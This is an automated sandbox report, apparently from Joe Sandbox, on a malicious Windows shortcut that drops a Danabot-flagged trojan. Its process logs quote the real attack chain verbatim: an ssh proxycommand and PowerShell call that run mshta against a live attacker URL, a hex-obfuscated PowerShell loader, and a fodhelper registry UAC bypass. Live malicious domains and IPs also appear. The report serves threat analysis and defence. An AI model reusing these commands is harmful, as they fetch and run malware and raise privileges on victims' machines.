          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 1307 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 459 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 5940Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -16602069666338586s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5768Thread sleep time: -20291418481080494s >= -30000s
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_02F7E190 FindFirstFileW,FindClose,43_2_02F7E190
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_02F7DBC4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,43_2_02F7DBC4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: mama.exe, 0000002B.00000003.1684115103.0000000000B95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: mshta.exe, 00000008.00000003.1615831977.00000164FD6C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1615739932.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636263545.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636097952.00000164FD6C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1624823344.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2965893996.000001A40F82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2967333414.000001A414E59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: ssh.exe, 00000000.00000002.1638779709.000001EE2F568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1602361585.00000267C97B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: mama.exe, 0000002B.00000002.3729112937.0000000000B44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4uASm
          Source: C:\Users\user\AppData\Roaming\mama.exeAPI call chain: ExitProcess graph end nodegraph_43-2515
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_03435340 LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,43_2_03435340
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf...
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exeJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nopJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mama.exe C:\Users\user\AppData\Roaming\mama.exe
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command 'dx0uczq[=v?uy\xmshta https://pravo-bashkortostan.ru/aaa.mp4dx0uczq[=v?uy\x'.substring(15, 44)" .
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kylfe($jfvkn){return -split ($jfvkn -replace '..', '0x$& ')};$ggul = kylfe('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
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kylfe($jfvkn){return -split ($jfvkn -replace '..', '0x$& ')};$ggul = kylfe('653adb09197706bff248b833ea1f27f5d58878713451ba8f31b442364ad50b177565132c81a8ce0c04335fb368b1bec213971455480775829f6bc6c5534155f957e2cfa508a5fe4c311e066403190fb60b4c1cbcaa36cdf33d5f614fd5f67a8c2528ebc6c4b5b8a0bce76a43045b19c3efd6f5ef3ba1ecb5686bd73b304c0491078b179da1ca0ae1f3da25490e7b58ee2ff863e346260adacb21649ff36146554f42d087971f82489ab30989e3f0674f581c0cf80616e540bcaa41b0428afce3f21fedf2f8472f6163e56ee7f1258524a03f60db1043baa3a075884983f2cf092375522f8988e476af72dc3c2fc7adc9fe0507992c92239aec2429066ebbd2b17cd0cf69b5f864c012338d6d8dd368382c5160478c96e06e3861df4b0a736f2572d32b9090b656b519c9ee189c51f0156b1592fee6ea266869208339b1f4a4cd0c9d18d67d96f8edeabc3c915510c81009138cdc34ed0e78c7b482df473e7eb8a0b3b274003f057ff8e56d8ee713118a6b7733a69e09e35c4f1734dc2cd1de6ac8baf5167083e43f074961524961b7179d937805ac28e554a85ffb0fce8ffc6971bd36500b19554e2cf2c414fd3f7d20f637c3fed2cbe4f16d815833af6587c0445b171f727757fcb88407da064e176d7ac09be6f81860913c206895922fa10cfc3d057e32f3236cb84f7ae4d8c4681039f91ad409d0ee7a284e00484796bdfd0c577c1033fc2b929938ae4ebe01ca086a4ef8df874cdfa55de6194b2add9fbbde3b65169b4ce6fc4c5d063449d421c5df87aeb418d87eb94d8085a780cff969515bfbeb7cdaa25c3e5ddf20fbb0a604b6ddaadcf97b9534a77f8a73360422df52b6736926bfb5d66ced1f6f797f1b6d9ade5e074859d887e8c3bad2d33a412611ba85a6107b8f004e605620d5e3f4fba15b1ff642ab09a70a27bfe4f97180e1a5489a15a3e5f7db53356e7f7869f6731f3815b6f7e852698335fa8bab0a12f68f66ee399ca6b7d1994fced4bfb476066214d61a279b592bede9bc4173840d28016672e7995c751b825a18ad0960afbbba9071cc631fad152ebe5d6da49db75b7bd20456369cda6719eca0462c83310f3f5ac28103792deeacdfa6a31d127726b84a5a8e39a884df8fecda2cdec9dc279c956d253761973c9ea36666f0c5dd4c4f3306483bf6811c7ed4f0265f0e66ff777c5bb9a9
b4324c54769c9b5d706b4ec485997d1adb50fd71564b9401e52e3a3f5cbbccb76bed1b5cf3af43b7e7c4c42dea2a7f2e21992968faa86787095556c265abb0db1b02f1c5c06e0b96eb6b38f98aa3878e78e92a9d5fba55b149c8dd782681a530f1c11d94505305c1ee8ef1f25970104e28dff99776f3628512c465dc2125a38927e4cfd827415d33dc2de13d550c5cd8abcd58eff5ef4b7cdfe93710eb277c3304084bd9201e5dabdebe54faef993c8a690421ab366c5cf613f7cac0628aad89849b65fff1054cb508e8d107d332de6e06598c86c6e7b2aa72a92b5d11793da067088a83abf915b5b690ef77973fdd05902457333bf3d9982ddc982ca6e51de08faee2b7b87dc3b7d2556d18306a68f6827eb9c7a69cea51744ac77093a6ddafbede1293f9be816ebb61f0ad6d7c6984f007ad085896b84a1791374ae2d29767fa6682b78e157c46b6b622fb0cc14fd5acf701f64474b5d1afbad672c4e15effe1ca5fbb418a59ab3ce357c55b1cc5c02697ed0b7dc5750ff0a46291413a4591cfd4e3b029f565168af5ee6c643baba78a73e0e7f2e781a6f2bb5b74b6d360125440c06278e8e7ac7a76d248db1e208518388f10a6bab46d4c01520d56940cd56758727e9268671527569a7159b1296762de8d769ddaf8005189ed580c0a99027d6d7c7986c91bb71beb4cf71419813de3cc12b2befea0bd89c8803d19d50f5348e88eb7a49f42528fcf43aa90404ef92e9cd2fdJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"
          Source: mama.exe, 0000002B.00000003.1618824342.000000007E870000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndTrayNotifyWndSysPagerToolbarWindow32U
          Source: mama.exe, 0000002B.00000003.1618824342.000000007E870000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: explorer.exeShell_TrayWnd
          Source: C:\Users\user\AppData\Roaming\mama.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW,43_2_02F7E2C8
          Source: C:\Users\user\AppData\Roaming\mama.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,43_2_02F7D768
          Source: C:\Users\user\AppData\Roaming\mama.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Roaming\mama.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
          Source: C:\Users\user\AppData\Roaming\mama.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
          Source: C:\Users\user\AppData\Roaming\mama.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\mama.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\mama.exe Code function: 43_2_03435920 GetVersionExW,GetVersionExW,LoadLibraryW,43_2_03435920
          Source: C:\Windows\System32\OpenSSH\ssh.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match File source: 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: mama.exe PID: 8756, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match File source: 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: mama.exe PID: 8756, type: MEMORYSTR
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 12 Process Injection | 11 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Modify Registry | LSASS Memory | 12 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 1 Native API | Logon Script (Windows) | Logon Script (Windows) | 131 Virtualization/Sandbox Evasion | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Multi-hop Proxy | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 12 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 165 System Information Discovery | VNC | GUI Input Capture | 1 Proxy | Data Transfer Size Limits | Service Stop
          Behavior Graph: ID: 1581224, Sample: vreFmptfUu.lnk, Startdate: 27/12/2024, Architecture: WINDOWS, Score: 100

          Source | Detection | Scanner | Label | Link
          vreFmptfUu.lnk | 37% | ReversingLabs | Shortcut.Trojan.Pantera |
          vreFmptfUu.lnk | 39% | Virustotal | | Browse
          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Roaming\mama.exe | 100% | Avira | TR/ATRAPS.Gen |
          C:\Users\user\AppData\Roaming\mama.exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Roaming\mama.exe | 71% | ReversingLabs | Win32.Trojan.Danabot |
          No Antivirus matches
          No Antivirus matches
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
          pravo-bashkortostan.ru | 150.241.97.10 | true | true | | unknown
          x1.i.lencr.org | unknown | unknown | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          https://pravo-bashkortostan.ru/ggg.pdf | false | Avira URL Cloud: safe | unknown
          https://pravo-bashkortostan.ru/aaa.mp4 | true | Avira URL Cloud: safe | unknown
          https://pravo-bashkortostan.ru/mama.exe | false | Avira URL Cloud: safe | unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://html4/loose.dtdmama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpfalse
                  high
                  https://pravo-bashkortostan.ru/aaa.mp4$global:?powershell.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.aiim.org/pdfua/ns/id/powershell.exe, 0000000D.00000002.1538124401.00000267B1A6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1538124401.00000267B1A66000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.openssl.org/Vmama.exe, 0000002B.00000003.1633314719.000000007EB44000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002B.00000002.3797722357.0000000063469000.00000040.00001000.00020000.00000000.sdmp, mama.exe, 0000002B.00000003.1637182986.000000007EB1A000.00000004.00001000.00020000.00000000.sdmpfalse
                    high
                    https://pravo-bashkortostan.ru/aaa.mp4gramFiles(x86)=C:mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.132.183.159 | unknown | Turkey | 42910 | PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR | true
206.206.125.221 | unknown | United States | 13332 | HYPEENT-SJUS | true
94.131.118.216 | unknown | Ukraine | 29632 | NASSIST-ASGI | true
150.241.97.10 | pravo-bashkortostan.ru | Spain | 207714 | TECNALIAES | true
                                                        IP
                                                        127.0.0.1
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1581224
                                                        Start date and time:2024-12-27 08:46:43 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 10m 28s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:53
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:vreFmptfUu.lnk
                                                        renamed because original name is a hash value
                                                        Original Sample Name:0fd3c13d822c330db0ff496a85ba3d91.lnk
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winLNK@78/73@4/5
                                                        EGA Information:
                                                        • Successful, ratio: 25%
                                                        HCA Information:Failed
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .lnk
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.218.208.109, 23.218.208.137, 199.232.210.172, 162.159.61.3, 172.64.41.3, 52.22.41.97, 3.219.243.226, 3.233.129.217, 52.6.155.20, 23.195.39.65, 23.32.238.163, 23.32.238.130, 23.32.238.147, 2.20.40.170, 23.32.238.137, 2.19.198.75, 23.32.238.242, 23.32.238.232, 23.32.238.225, 23.32.238.208, 23.32.238.201, 23.32.238.211, 23.32.238.192, 23.32.238.219, 23.32.238.217, 23.193.114.18, 23.193.114.26, 13.107.246.63, 172.202.163.200
                                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                        • Execution Graph export aborted for target mshta.exe, PID 7936 because there are no executed function
                                                        • Execution Graph export aborted for target powershell.exe, PID 180 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7836 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:47:38 | API Interceptor | 3x Sleep call for process: svchost.exe modified
02:47:40 | API Interceptor | 169x Sleep call for process: powershell.exe modified
02:48:00 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
02:48:05 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
02:48:45 | API Interceptor | 7785305x Sleep call for process: mama.exe modified
                                                        No context
                                                        dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.132.193.46
                                                        nabm68k.elfGet hashmaliciousUnknownBrowse
                                                        • 188.132.241.224
                                                        dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.132.193.46
                                                        PO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                                        • 188.132.193.46
                                                        DRUMMONDLTD _ 21ST_OCTOBER_2024 _.PDFGet hashmaliciousUnknownBrowse
                                                        • 78.135.79.21
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eskript.batGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        msgde.exeGet hashmaliciousQuasarBrowse
                                                        • 150.241.97.10
                                                        6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                        • 150.241.97.10
                                                        https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                        • 150.241.97.10
                                                        ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                                                        • 150.241.97.10
                                                        GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                        • 150.241.97.10
                                                        TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                        • 150.241.97.10
                                                        Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 150.241.97.10
                                                        ciwa.mp4.htaGet hashmaliciousLummaC, PureLog StealerBrowse
                                                        • 150.241.97.10
                                                        37f463bf4616ecd445d4a1937da06e19aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        installer.batGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        skript.batGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        din.exeGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        yoda.exeGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        lem.exeGet hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                        • 150.241.97.10
                                                        utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                        • 150.241.97.10
                                                        script.ps1Get hashmaliciousVidarBrowse
                                                        • 150.241.97.10
                                                        libcurl.dllGet hashmaliciousMatanbuchusBrowse
                                                        • 150.241.97.10
                                                        No context
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8192
                                                        Entropy (8bit):0.35999246155449205
                                                        Encrypted:false
